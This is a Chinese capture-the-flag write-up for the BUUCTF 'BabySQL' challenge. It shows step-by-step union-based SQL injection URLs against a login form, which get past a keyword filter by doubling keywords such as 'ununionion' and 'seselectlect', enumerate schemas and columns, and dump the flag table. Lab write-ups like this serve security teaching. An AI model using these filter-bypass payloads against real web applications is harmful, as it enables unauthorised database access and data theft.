buuctf-[极客大挑战 2019]BabySQL（小宇特详解）

buuctf-[极客大挑战 2019]BabySQL（小宇特详解）

这里看题的话是一道SQL注入。

这里先尝试一下万能密码

这里发现它过滤了or（直接删除了or）

这里尝试进行双写

也就是oorr，这里删除了or后又重新构造了一个or

这里发现还是不行

这里先看一下双写union select 1

/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23

这里发现不是报错，而是列数不对

当列数为3的时候对了

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,3 %23

然后这里就进行常规的sql注入即可

这里先进行爆库

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23

然后爆出所有的数据库

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

这里看到了ctf库，爆破

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere 
 table_name="Flag" %23

爆数据

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag) %23